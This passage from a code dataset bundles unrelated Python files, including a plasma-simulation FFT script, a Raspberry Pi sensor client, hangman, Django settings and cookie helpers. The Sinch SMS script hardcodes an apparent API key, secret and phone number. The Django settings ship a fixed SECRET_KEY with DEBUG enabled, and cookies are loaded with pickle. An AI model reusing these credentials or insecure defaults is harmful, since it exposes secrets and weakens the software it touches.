= m0*frequency/q0\n denunit = frequency**2*epsilon0*m0/q0**2\n print('electric field unit: '+str(exunit))\n print('magnetic field unit: '+str(bxunit))\n print('density unit nc: '+str(denunit))\n font = {'family' : 'monospace', \n 'color' : 'black', \n 'weight' : 'normal', \n 'size' : 28, \n } \n if (os.path.isdir(savedir) == False):\n os.mkdir(savedir)\n \n if (os.path.isdir(fftdir) == False):\n os.mkdir(fftdir) \n ######### Script code drawing figure ################\n # constant\n ###\n c = 3e8\n micron = 1e-6\n lamada = const.lamada #10.6 * micron\n gridnumber = const.Nx #2400\n start = 1\n stop = const.stop #5889 #17000\n step = 1\n dt_snapshot= const.dt_snapshot #1e-15\n dt = dt_snapshot*1e15 #fs\n x_max = const.x_max #80 * lamada #60 * lamada #micron\n x_min = 0 * micron\n x_end = x_max - x_min\n y = const.Ny/2 \n window_start_time = (x_max - x_min) / c\n # start_move_number = window_start_time * 1e15 #fs\n start_move_number = int(window_start_time / dt_snapshot)\n delta_x = x_end/gridnumber\n t_end = stop * dt_snapshot\n #x_interval=const.x_interval #10\n t_total=1e15*x_end/c #fs\n t_size=t_total/(dt_snapshot*1e15)+1 #t_grid_number\n if t_end-window_start_time<0:\n xgrid = int(gridnumber)\n else: \n xgrid = int(gridnumber + c*(t_end-window_start_time)/delta_x)\n\n####################\n #x_interval= const.x_interval #10\n t_total=1e15*x_end/c #fs\n t_size=int(t_total/dt)+1+1 \n\n# allay define\n SHAPE = ((int(xgrid/x_interval)+1,t_size))\n\n # xRange = int(xgrid/x_interval + 1)\n xRange = int(xEnd - xStart)\n tRange = t_size\n # xStart = c * (tStart-start_move_number) * const.dt_snapshot / const.delta_x\n # xEnd = c * (tStart-start_move_number) *const.dt_snapshot / const.delta_x + 
const.Nx\n\n tStart = float(xStartDistance)/c/const.dt_snapshot #xStart*x_interval * const.delta_x / const.dt_snapshot / c # + start_move_number - const.Nx*const.delta_x/c/const.dt_snapshot\n tEnd = tStart + const.delta_x * const.Nx/c/const.dt_snapshot\n print('tStart,tEnd',tStart,tEnd)\n tEnd = min(tEnd,const.stop)\n print(xRange,tRange,const.Ny)\n a = np.zeros((xRange+2,tRange+2,int((const.Ny-1)/y_interval+1)))\n print('a.shape',a.shape)\n print(xRange,tRange,const.Ny)\n shm = shared_memory.SharedMemory(create=True, size=a.nbytes)\n\n ss1,ss2=a.shape,a.dtype\n pool = multiprocessing.Pool(processes=96,initargs=(ss1,ss2))\n print('range:',np.arange(int(tStart),int(tEnd)))\n results = pool.map(extract,np.arange(int(tStart),int(tEnd)))\n pool.close()\n pool.join()\n xt = np.ndarray(a.shape, dtype=a.dtype, buffer=shm.buf)\n np.save(savedir+savename, xt)\n np.save(savedir + 'Xarr.npy',Xarr)\n shm.close()\n shm.unlink()\n print('XtMatr saved')\n Xf = np.fft.rfft(xt,axis=1)\n np.save(savedir + str(x_interval)+'_'+str(y_interval) +'XfMatr.npy',Xf)\n print('XfMatr saved')\n","sub_path":"te.py","file_name":"te.py","file_ext":"py","file_size_in_byte":6101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"180258578","text":"#//----------------------------------------------------------------------\n#// Copyright 2007-2010 Mentor Graphics Corporation\n#// Copyright 2007-2011 Cadence Design Systems, Inc.\n#// Copyright 2010-2011 Synopsys, Inc.\n#// Copyright 2019-2020 Tuomas Poikela (tpoikela)\n#// All Rights Reserved Worldwide\n#//\n#// Licensed under the Apache License, Version 2.0 (the\n#// \"License\"); you may not use this file except in\n#// compliance with the License. You may obtain a copy of\n#// the License at\n#//\n#// http://www.apache.org/licenses/LICENSE-2.0\n#//\n#// Unless required by applicable law or agreed to in\n#// writing, software distributed under the License is\n#// distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR\n#// CONDITIONS OF ANY KIND, either express or implied. 
See\n#// the License for the specific language governing\n#// permissions and limitations under the License.\n#//----------------------------------------------------------------------\n\n\nfrom uvm import (UVMComponent, UVMConfigDb, sv, uvm_error)\nfrom classC import ClassC\n\n\nclass ClassB(UVMComponent):\n\n\n def __init__(self, name, parent):\n super().__init__(name, parent)\n self.debug = 0 # type: int\n self.u1 = None # type: ClassC\n\n def build_phase(self, phase):\n super().build_phase(phase)\n\n _str = []\n if UVMConfigDb.get(self, \"\", \"debug\", _str):\n self.debug = _str[0]\n else:\n uvm_error(\"NO_CONF_MATCH\", \"Did not get debug\")\n UVMConfigDb.set(self, \"u1\", \"v\", 0)\n\n sv.display(\"%s: In Build: debug = %0d\", self.get_full_name(), self.debug)\n\n self.u1 = ClassC(\"u1\", self)\n\n\n def get_type_name(self):\n return \"B\"\n\n def do_print(self, printer):\n printer.print_field(\"debug\", self.debug, 1)\n","sub_path":"test/examples/simple/configuration/manual/classB.py","file_name":"classB.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"25737783","text":"from GPIO_ClassLib import DCMOTOR\nfrom GPIO_ClassLib import TempHumi\nfrom GPIO_ClassLib import Light\nfrom GPIO_ClassLib import SPI\nfrom GPIO_ClassLib import PIR\nfrom multiprocessing import Process,Queue\nimport sys\nimport spidev\nimport time\nimport sqlite3\nimport socket\n\nserver_ip='70.12.107.173'\nserver_port=8282\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ndc_pin=(4,25,12)\n\ndc= DCMOTOR(dc_pin,'out')\n\npir=PIR(24,'in')\n\n\ndef ProcessSensors(loop,q):\n th= TempHumi()\n light= Light()\n spi=SPI()\n \n list_temp=[]\n list_humi=[]\n list_light=[]\n list_cds=[]\n list_vr=[]\n \n while loop:\n th.measure_tmp()\n list_temp.append(\"Temp\")\n list_temp.append(th.measure_tmp())\n q.put(list_temp)\n \n th.measure_humi()\n list_humi.append(\"Humi\")\n list_humi.append(th.measure_humi())\n q.put(list_humi)\n time.sleep(1)\n \n light.readLight()\n list_light.append(\"Ligt\")\n list_light.append(light.readLight())\n q.put(list_light)\n time.sleep(1)\n \n spi.printcds()\n list_cds.append(\"Cds \")\n list_cds.append(spi.printcds())\n q.put(list_cds)\n time.sleep(1)\n \n spi.printvr()\n list_vr.append(\"Vr \")\n list_vr.append(spi.printvr())\n q.put(list_vr)\n time.sleep(1)\n \n list_temp=[]\n list_humi=[]\n list_light=[]\n list_cds=[]\n list_vr=[]\n time.sleep(5)\n \n\ndef ProcessPir(loop,q):\n list_pir=[]\n while loop:\n pir.PIR_motionDetection()\n if(pir.PIR_motionDetection()==True):\n list_pir.append(\"Pir\")\n list_pir.append(\"motion dectect\")\n q.put(list_pir)\n else:\n list_pir.append(\"Pir\")\n list_pir.append(\"motion not dectect\")\n q.put(list_pir)\n time.sleep(0.5)\n\ndef ProcessData(loop,q):\n global sock\n client_id='100'\n command='s'\n send_data=''\n data_len='10'\n while loop:\n #if q.empty():\n # print(\"q is empty\")\n #else:\n data=q.get()\n if data[0]=='Temp':\n send_data=client_id+command+data[0]+data_len\n sock.send(send_data.encode())\n print(send_data)\n send_data=str(Cutting(data[1],10))\n sock.send(send_data.encode())\n print(send_data)\n elif data[0]=='Humi':\n send_data=client_id+command+data[0]+data_len\n sock.send(send_data.encode())\n send_data=str(Cutting(data[1],10))\n sock.send(send_data.encode())\n elif data[0]=='Ligt':\n send_data=client_id+command+data[0]+data_len\n sock.send(send_data.encode())\n send_data=str(Cutting(data[1],10))\n 
sock.send(send_data.encode())\n        elif data[0]=='Cds ':\n            send_data=client_id+command+data[0]+data_len\n            sock.send(send_data.encode())\n            send_data=str(Cutting(data[1],10))\n            sock.send(send_data.encode())\n        elif data[0]=='Vr ':\n            send_data=client_id+command+data[0]+data_len\n            sock.send(send_data.encode())\n            send_data=str(Cutting(data[1],10))\n            sock.send(send_data.encode())\n        print(\"data all printed\")\n\n\ndef echo_client(host,port):\n    global sock\n\n    server_address = (host, port)\n    print(\"[Connecting to %s port %s]\" % server_address)\n\n    sock.connect(server_address)\n\n    print(\"[Connected!]\")\n\ndef Cutting(data,number):\n    # truncate to at most `number` characters and return the result\n    data=str(data)\n    if len(data)>number:\n        data=data[0:number]\n    return data\n\ndef main():\n    try:\n        #echo_client(server_ip,server_port)\n        loop=True\n        q=Queue()\n        p=Process(target=echo_client,args=(server_ip,server_port))\n        p1=Process(target=ProcessSensors, args=(loop,q))\n        p3=Process(target=ProcessData,args=(loop,q))\n        #p2=Process(target=ProcessPir,args=(loop,q))\n        p.start()\n        p1.start()\n        p3.start()\n        #p2.start()\n        print(q.qsize())\n\n    except KeyboardInterrupt:\n        # Process has no stop() method; terminate() is the correct call\n        p1.terminate()\n        p.terminate()\n        p3.terminate()\n        #p2.terminate()\n\n        # spi is created inside ProcessSensors and cannot be closed from here\n        sys.exit()\n\nif __name__=='__main__':\n    main()\n","sub_path":"드라이브 박제/180524_Day3/project(승용)/poject_1.py","file_name":"poject_1.py","file_ext":"py","file_size_in_byte":4247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"504789778","text":"# Hangman\n# Letters available to guess will be stored in a list. Once entered, they are removed.\n# The \"hanging\" man will be represented by a counter up to 5.\n# The word to guess will be randomly selected from a list.\n# The word to guess will initially appear as a series of asterisks.\n# As letters are guessed correctly, asterisks will be replaced with those letters.\n# Once the guessed word is complete, the game is won.\n# Once the counter for incorrect guesses reaches its limit (targetnum), the game is lost.\n\nimport pprint\nimport random\n\n# how many guesses you get\ntargetnum = 5\n\n\n# Generate a \"random\" word\ndef setup():\n    words = [\"airplane\", \"batman\", \"canada\", \"dabble\", \"elephant\", \"gravelly\"]\n    global theword\n    global hiddenlist\n    global thewordlist\n    global counter\n\n    theword = words[random.randint(0, len(words) - 1)]\n    # turn the word to be guessed into a list of its individual letters, so that we can run through each letter\n    thewordlist = list(theword)\n\n    # thewordlist is converted to asterisks the same length as the word\n    hiddenlist = []\n    for i in thewordlist:\n        hiddenlist.append(\"*\")\n\n    counter = 0\n\n\n# the main guessing loop.\n# performs different actions based on user input for guessing\ndef guessing():\n    setup()\n    # the list of letters in the alphabet... don't know if there's a better way to do this\n    remainingLetters = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"o\", \"p\", \"q\", \"r\", \"s\",\n                        \"t\", \"u\", \"v\", \"w\", \"x\", \"y\", \"z\"]\n    # this guessedletters list stores the letters that have already been guessed\n    guessedLetters = []\n\n    print(\"HANGMAN: by Alex T\")\n    print(\"---------------------------\")\n    print()\n    print(\"Here's your word: \" + \"\".join(hiddenlist))\n\n    # while loop to make the game end after we run out of guesses\n    while counter < targetnum:\n\n        # Checks for a win at the beginning of the loop\n        if hiddenlist == thewordlist:\n            print(\"Congrats! You've won!\")\n            replay()\n\n        # Prompt statement. 
Plays every time.\n print(\"You have \" + str(targetnum - counter) + \" guesses left.\")\n print(\"Enter a letter. '?' for available letters, '!' for guessed letters, ':' for the word so far.\")\n playerGuess = input()\n\n # Input \"?\": Show what can still be guessed.\n if playerGuess == \"?\":\n print(\"The remaining letters are:\")\n print(remainingLetters)\n\n # Input \"!\": Show what has been guessed.\n elif playerGuess == \"!\":\n print(\"The guessed letters are:\")\n print(guessedLetters)\n\n elif playerGuess ==\":\":\n print(\"The word so far is:\")\n print(\"\".join(hiddenlist))\n\n # Condition if a guess is \"valid\"\n # \"Valid guess\" meaning it has not yet been guessed, not a \"help\" symbol, nor any non-single letter string\n elif playerGuess in remainingLetters:\n # Take the guessed letter out of the remaining letters, and add it to the guessed letters.\n remainingLetters.remove(playerGuess)\n guessedLetters.append(playerGuess)\n guessedLetters.sort()\n # Pass the guess to evaluate() to see if it's correct.\n evaluate(playerGuess)\n # print(\"The remaining letters are:\")\n # print(remainingLetters)\n\n # Condition if guess is \"invalid\"\n # \"Invalid guess\" meaning it has been guessed already. We don't increment the counter for this.\n elif playerGuess in guessedLetters:\n print(playerGuess + \" has already been guessed. Try again.\")\n print(\"The guessed letters are:\")\n print(guessedLetters)\n\n # Invalid input: not a letter or a help command\n else:\n print(\"Could not proceed. Try again.\")\n\n # Haven't figured out where a win should be defined.\n # Once the counter runs out guessing() will automatically give you the lose condition.\n print(\"You lose! WOMP WOMP.\")\n print()\n replay()\n\n\n\ndef replay():\n # Give user option to play again\n print(\"Play again? Y/N\")\n playagain = input()\n # a list containing possible versions of yes\n y = [\"Y\", \"y\", \"yes\", \"Yes\", \"YES\", \"hella\", \"yessir\", \"yep\", \"FO SHO\"]\n # N = [\"N\",\"n\",\"no\",\"No\",\"NO\",\"nah\",\"nope\"]\n if playagain in y:\n print()\n guessing()\n else:\n exit()\n\n\n# This evaluate function determines whether a guess is right or not, and responds accordingly.\ndef evaluate(letter):\n global counter\n if letter in thewordlist:\n currIndex = 0\n for i in thewordlist:\n if letter == i:\n hiddenlist[currIndex] = letter\n currIndex += 1\n print(\"Good guess. Here is the word:\")\n print(\"\".join(hiddenlist))\n elif letter not in thewordlist:\n print(\"Nope. 
Wrong guess.\")\n counter += 1\n\n\n\nguessing()","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":4943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"340328938","text":"import time\r\nfrom sinchsms import SinchSMS\r\n\r\nnumber = '+447948050817'\r\nmessage = 'shaojie is smart'\r\n\r\nclient = SinchSMS('0a0cb8f3-829b-4613-b34c-f96ed8a94978', 'ATOI/bqb0E2XJaSv1KOQ/Q==')\r\n\r\nprint(\"Sending '%s' to %s\" % (message, number))\r\nresponse = client.send_message(number, message)\r\nmessage_id = response['messageId']\r\n\r\nresponse = client.check_status(message_id)\r\nwhile response['status'] != 'Successful':\r\n print(response['status'])\r\n time.sleep(1)\r\n response = client.check_status(message_id)\r\nprint(response['status'])\r\n","sub_path":"sms.py","file_name":"sms.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"167137834","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# __author__ = 'hq.l'\n\nimport numpy as np\nimport cv2\n\nlogo = cv2.imread(\"tmp.jpg\")\nim = cv2.imread(\"1.jpg\")\ncv2.imshow('logo', logo)\ncv2.imshow('img', im)\n\nx1 = 10\ny1 = 10\nimg2 = im[10:69, 10:101]\n\nim[10:69, 10:101] = cv2.addWeighted(logo,1,img2,0,0)\n\ncv2.imshow('res', im)\ncv2.waitKey(0)","sub_path":"OpenCV_pro/roi.py","file_name":"roi.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"629928030","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def reverseList(self, head: ListNode) -> ListNode:\n mStack = []\n while head != None:\n mStack.append(head.val)\n head = head.next\n \n dummyHead = ListNode()\n pointer = dummyHead\n while len(mStack) != 0:\n pointer.next = ListNode(mStack.pop())\n pointer = pointer.next\n \n return dummyHead.next","sub_path":"206. 
Reverse Linked List/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"642614250","text":"import argparse\nimport json\nimport os\nimport shlex\n\n\ndef parse_json(json_path):\n with open(json_path) as f:\n data = json.load(f)\n return data\n\n\ndef output_bash_commands(json_path):\n for k, v in parse_json(json_path).items():\n value = shlex.quote(str(v))\n export = f\"export {k}={value}\"\n print(export)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"json_path\", type=str)\n args = parser.parse_args()\n output_bash_commands(args.json_path)\n","sub_path":"runtime/load_env.py","file_name":"load_env.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"2144866","text":"\r\n\r\n\r\n #Gamers2303\r\n#New York Rush\r\n#Adriana,Briget,Rosario,Jozka\r\n#\r\nfrom gamelib import*#import game library\r\ngame = Game(800,600,\"New York Rush\")\r\n\r\n#title\r\ntitle = Image(\"title.png\",game)\r\ntitle.y -= 150\r\n\r\n#bk\r\nbk = Image(\"Backup Cover.jpg\",game)#Image Object\r\nbk.resizeTo(800,600)\r\ngame.setBackground(bk)\r\n\r\n#BK- Level 1\r\nbk1 = Image(\"NYC.jpg\",game)\r\nbk1.resizeTo(800,600)\r\n\r\n#bm\r\nbm = Image(\"BM1.gif\",game)\r\nbm.resizeTo(50,40)\r\nbm.moveTo(50,513)\r\nbm.resizeBy(330)\r\n\r\n#tc\r\ntc = []\r\nfor index in range(20):\r\n tc.append(Image(\"tc.png\",game))\r\nfor index in range(20):\r\n x = randint(900,4000) \r\n tc[index].resizeBy(-90)\r\n tc[index].moveTo(x, 550)\r\n tc[index].setSpeed(5,90)\r\n\r\n#You Win\r\nyw = Image(\"YW.png\",game)\r\nyw.moveTo(405,150)\r\n\r\n \r\n \r\n\r\n#elderly\r\nelderly = Image(\"elderly.png\",game)\r\nelderly.resizeTo(30,40)\r\nelderly.moveTo(470,513)\r\nelderly.resizeBy(330)\r\n\r\n#play\r\nplay = Image(\"play.png\",game)\r\nplay.moveTo(550,20)\r\nplay.resizeBy(-40)\r\nplay.y += 200\r\n\r\n#END\r\nend = Image (\"end.jpg\",game)\r\nend.resizeTo(800,600)\r\n\r\n#gameover\r\ngameover = Image (\"gameover.png\",game)\r\ngameover.moveTo(405,150)\r\n\r\n\r\njumping = False #Used to check to see if you are jumping\r\nlanded = False #Used to check to see if you have landed on the \"ground\" (platform)\r\nfactor = 1 #Used for a slowing effect of the jumping\r\n\r\n#Title Screen - first game loop\r\nwhile not game.over:\r\n game.processInput()\r\n\r\n bk.draw()\r\n play.draw()\r\n title.draw()\r\n \r\n\r\n if play.collidedWith(mouse) and mouse.LeftClick:\r\n game.over = True\r\n\r\n game.update(30)\r\n\r\ngame.over = False\r\n#Level 1\r\ntcPassed = 0\r\nwhile not game.over:\r\n game.processInput()\r\n\r\n bk1.draw()\r\n bm.draw()\r\n\r\n #tc\r\n for index in range(20):\r\n tc[index].move()\r\n if tc[index].collidedWith(bm):\r\n bm.health -=1\r\n if tc[index].isOffScreen(\"left\") and tc[index].visible:\r\n tcPassed += 1\r\n tc[index].visible = False\r\n\r\n if tcPassed >= 20:\r\n end.draw()\r\n yw.draw()\r\n game.drawText(\"YOU WIN!\",100,5)\r\n \r\n\r\n if tc[index].isOffScreen(\"left\"):\r\n x = randint(900,4000) \r\n tc[index].moveTo(x, 550)\r\n \r\n \r\n \r\n \r\n\r\n \r\n if bm.health <0: \r\n end.draw()\r\n gameover.draw()\r\n game.drawText(\"YOU LOSE!\",100,5)\r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n\r\n \r\n\r\n#jumping\r\n if bm.y< 400:\r\n landed = False#not landed\r\n #if bm.collidedWith(platform,\"rectangle\"):\r\n #landed = True\r\n else:\r\n landed = 
True\r\n\r\n if keys.Pressed[K_SPACE] and landed and not jumping:#if you have landed and are not jumping and press the space bar then jump\r\n jumping = True\r\n\r\n if jumping:\r\n bm.y -=40*factor\r\n #Make the character go up. Factor creates a slowing effect to the jump\r\n factor*=.95#fall slowly\r\n landed = False\r\n #Since you are jumping you are no longer staying on land\r\n if factor < .12:\r\n jumping = False\r\n #Stop jumping once the slowing effect finishes\r\n factor = 1\r\n \r\n if not landed:\r\n bm.y +=17#adjust as needed\r\n#bm keys \r\n if keys.Pressed[K_RIGHT]:\r\n bm.x += 8\r\n if keys.Pressed[K_LEFT]:\r\n bm.x -= 8\r\n\r\n\r\n game.drawText(\"Health: \" + str(bm.health) , bm.x-20, bm.y+50)\r\n\r\n\r\n \r\n game.update(30)\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n game.update(60)\r\ngame.quit()\r\n\r\n","sub_path":"NYC RUSH.py","file_name":"NYC RUSH.py","file_ext":"py","file_size_in_byte":3826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"480465073","text":"\"\"\"\nThe classes in this file are for aiding the building of filtered cypher queries\nin NeoTransformer.\n\"\"\"\n\nfrom enum import Enum\nfrom typing import Union, Tuple\n\nclass QueryLocation(Enum):\n SUBJECT='subject'\n OBJECT='object'\n EDGE='edge'\n NODE='node'\n\n @staticmethod\n def values():\n return [x.value for x in QueryLocation]\n\nclass QueryType(Enum):\n LABEL='label'\n CATEGORY='category'\n PROPERTY='property'\n\n @staticmethod\n def values():\n return [x.value for x in QueryType]\n\n\nclass Query(object):\n \"\"\"\n Represents a cypher Query in :py:class:src.graphical_db\n \"\"\"\n def __init__(self, target:str, value:Union[str, Tuple[str, str]]):\n query_local, query_type = target.split('_')\n self.target = target\n self.query_local = QueryLocation(query_local)\n self.query_type = QueryType(query_type)\n self.value = value\n\n if self.query_type is QueryType.PROPERTY:\n assert isinstance(value, tuple) and len(value) == 2, 'Property filter values must be a tuple of length 2'\n\n def __str__(self):\n \"\"\"\n A human readable string representation of a Filter object\n types:\n subject_category\n object_category\n node_category\n edge_label\n\n subject_property\n object_property\n node_property\n edge_property\n \"\"\"\n return 'Query[target={}, value={}]'.format(self.target, self.value)\n\n @staticmethod\n def build(query_local:QueryLocation, query_type:QueryType, value):\n \"\"\"\n A factory method for building a Filter using the given enums\n\n Only edges should have the target \"edge_label\", and edges should not be\n combined with the \"category\" location.\n \"\"\"\n assert not (query_type is QueryType.LABEL and query_local is not QueryLocation.EDGE)\n assert not (query_local is QueryLocation.EDGE and query_type is QueryType.CATEGORY)\n\n return Query('{}_{}'.format(query_local.value, query_type.value), value)\n\n @staticmethod\n def targets():\n targets = []\n for query_type in QueryType:\n for query_local in QueryLocation:\n try:\n targets.append(\n Query.build(query_type=query_type, query_local=query_local, value=(None, None)).target\n )\n except:\n continue\n return targets\n\nif __name__ == '__main__':\n print(Query('subject_label', 'gene'))\n print(Query.build(QueryLocation.EDGE, QueryType.PROPERTY, ('property_name', 'property_value')))\n 
print(Query.targets())\n","sub_path":"build/lib/network/model/graph_query.py","file_name":"graph_query.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"136120569","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals, absolute_import\n\nimport os\nimport environ\nfrom django.conf import global_settings\nfrom django.contrib import messages\n\nfrom vaas.configuration.loader import YamlConfigLoader\n\n\nenv = environ.Env()\n\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\ncurrent_dir = os.path.abspath(os.path.dirname(__file__))\nconfig_loader = YamlConfigLoader()\n\nif not config_loader.determine_config_file('db_config.yml'):\n raise EnvironmentError('Cannot find db_config file')\n\nDATABASES = config_loader.get_config_tree('db_config.yml')\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'pwm_&@a%yd8+7mqf9=*l56+y!@sb7ab==g942j7++gnr9l2%*d'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\n# SECURITY WARNING: don't run with debug turned on in production!\nALLOWED_HOSTS = []\n\nMESSAGE_STORAGE = 'django.contrib.messages.storage.session.SessionStorage'\n\n# Application definition\nINSTALLED_APPS = (\n 'django_nose',\n 'vaas.adminext',\n 'django_admin_bootstrapped',\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'tastypie',\n 'simple_history',\n 'vaas.manager',\n 'vaas.cluster',\n 'vaas.monitor',\n 'vaas.account',\n 'vaas.purger',\n 'taggit',\n 'django_ace',\n 'social_django',\n)\n\n# Plugins definition\nINSTALLED_PLUGINS = ()\nMIDDLEWARE_PLUGINS = ()\n\nMIDDLEWARE_CLASSES = (\n 'djangosecure.middleware.SecurityMiddleware',\n 'log_request_id.middleware.RequestIDMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'vaas.manager.middleware.VclRefreshMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'simple_history.middleware.HistoryRequestMiddleware',\n)\n\nSECURE_CONTENT_TYPE_NOSNIFF = True\n\nROOT_URLCONF = 'vaas.urls'\n\nWSGI_APPLICATION = 'vaas.external.wsgi.application'\n\nSIGNALS = 'on'\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'Europe/Warsaw'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\n\nSTATIC_URL = '/static/'\nSTATIC_ROOT = os.path.join(BASE_DIR, \"static/\")\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [os.path.join(BASE_DIR, 'templates'), ],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.contrib.auth.context_processors.auth',\n 'django.template.context_processors.i18n',\n 'django.template.context_processors.debug',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.request',\n 'django.template.context_processors.tz',\n 'django.contrib.messages.context_processors.messages',\n 'social_django.context_processors.backends',\n 'social_django.context_processors.login_redirect',\n 
],\n },\n },\n]\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'\n },\n },\n 'handlers': {\n 'file': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'filename': '/tmp/debug.log',\n 'formatter': 'verbose'\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['file'],\n 'propagate': False,\n 'level': 'ERROR',\n },\n 'vaas': {\n 'handlers': ['file'],\n 'propagate': False,\n 'level': 'DEBUG',\n },\n '': {\n 'handlers': ['file'],\n 'level': 'INFO',\n }\n }\n}\n\nVAAS_LOADER_PARTIAL_RELOAD = False\nVAAS_LOADER_MAX_WORKERS = 30\n\nREFRESH_TRIGGERS_CLASS = (\n 'Probe', 'Backend', 'Director', 'VarnishServer', 'VclTemplate', 'VclTemplateBlock', 'TimeProfile', 'VclVariable'\n)\n\n# CELERY\nBROKER_URL = env.str('BROKER_URL', default='redis://localhost:6379/1')\nCELERY_RESULT_BACKEND = env.str('CELERY_RESULT_BACKEND', default='redis://localhost:6379/2')\nCELERY_TASK_RESULT_EXPIRES = env.int('CELERY_TASK_RESULT_EXPIRES', default=600)\nCELERY_TASK_SERIALIZER = 'json'\nCELERY_RESULT_SERIALIZER = 'json'\nCELERY_IGNORE_RESULT = env.bool('CELERY_IGNORE_RESULT', False)\nCELERY_TASK_PUBLISH_RETRY = env.bool('CELERY_TASK_PUBLISH_RETRY', True)\n\nVARNISH_COMMAND_TIMEOUT = 5\n\n# UWSGI CONTEXT SWITCH (UGREEN)\nENABLE_UWSGI_SWITCH_CONTEXT = env.bool('ENABLE_UWSGI_SWITCH_CONTEXT', False)\n\nVCL_TEMPLATE_COMMENT_REGEX = env.str('VCL_TEMPLATE_COMMENT_REGEX', default=None)\nVCL_TEMPLATE_COMMENT_VALIDATION_MESSAGE = env.str('VCL_TEMPLATE_COMMENT_VALIDATION_MESSAGE', default=None)\n","sub_path":"vaas-app/src/vaas/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"479577288","text":"# Dependencies\nimport re\n\n# Data\ntext1 = \"crypto-bot that is trading Bitcoin and other currencies\"\ntext2 = \"cryptography encryption methods that can be cracked easily with quentum computers\"\n\n# One-liner\npattern = re.compile(\"crypto(.{1,30})coin\")\n\n# Result\nprint(pattern.match(text1))\nprint(pattern.match(text2))","sub_path":"regex_01.py","file_name":"regex_01.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"166778913","text":"from typing import Optional, Any, List\nimport os\nfrom time import time\nimport pickle\nfrom http.cookiejar import MozillaCookieJar, Cookie\nfrom requests.cookies import RequestsCookieJar\n\nfrom nhltv_lib.common import touch\n\nCOOKIE_FILE = \"auth_cookie\"\n\n\ndef save_cookies_to_txt(cookies: List[Any], filename: str) -> None:\n # Ensure the cookie file exists\n if not os.path.isfile(filename):\n touch(filename)\n\n cjar = MozillaCookieJar(filename)\n for cookie in cookies:\n cjar.set_cookie(cookie)\n cjar.save(ignore_discard=False)\n\n\ndef load_cookie() -> List[Optional[Any]]:\n # Ensure the cookie file exists\n if not os.path.isfile(COOKIE_FILE):\n touch(COOKIE_FILE)\n\n with open(COOKIE_FILE, \"rb\") as f:\n try:\n return pickle.load(f)\n except EOFError:\n return []\n\n\ndef save_cookie(cookies: RequestsCookieJar) -> None:\n # Ensure the cookie file exists\n if not os.path.isfile(COOKIE_FILE):\n touch(COOKIE_FILE)\n\n with open(COOKIE_FILE, \"wb\") as f:\n return pickle.dump(cookies, f)\n\n\ndef create_nhl_cookie(name: str, value: str) -> Cookie:\n return Cookie(\n version=None,\n name=name,\n value=value,\n 
